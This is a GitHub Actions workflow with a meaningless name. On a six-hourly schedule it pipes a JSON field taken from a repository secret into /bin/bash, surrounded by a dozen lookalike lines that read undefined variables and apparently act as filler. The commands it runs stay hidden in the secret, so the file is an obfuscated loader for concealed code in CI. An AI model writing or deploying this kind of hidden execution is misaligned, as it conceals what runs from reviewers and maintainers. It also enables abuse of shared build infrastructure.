name: numberfreethrow

on:
  workflow_dispatch:
  schedule:
    - cron: '16 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: numberfreethrow
        env:
          i38: ${{ secrets.i38 }}
        run: |
          echo $i38 | jq -r .si71936 | /bin/bash
          echo $n7 | jq -r .xy41 | /bin/bash
          echo $j8902 | jq -r .q707 | /bin/bash
          echo $khrmw50777 | jq -r .ekgad17 | /bin/bash
          echo $yzuy060 | jq -r .wcl44 | /bin/bash
          echo $wqq2374 | jq -r .eoiox9 | /bin/bash
          echo $enhpv1863 | jq -r .xtko87499 | /bin/bash
          echo $i12058 | jq -r .im551 | /bin/bash
          echo $bygpg254 | jq -r .dx5 | /bin/bash
          echo $l05 | jq -r .enn03160 | /bin/bash
          echo $cjbq6 | jq -r .s8 | /bin/bash
          echo $ap83846 | jq -r .tjxb9 | /bin/bash
          echo $tpate2954 | jq -r .i591 | /bin/bash

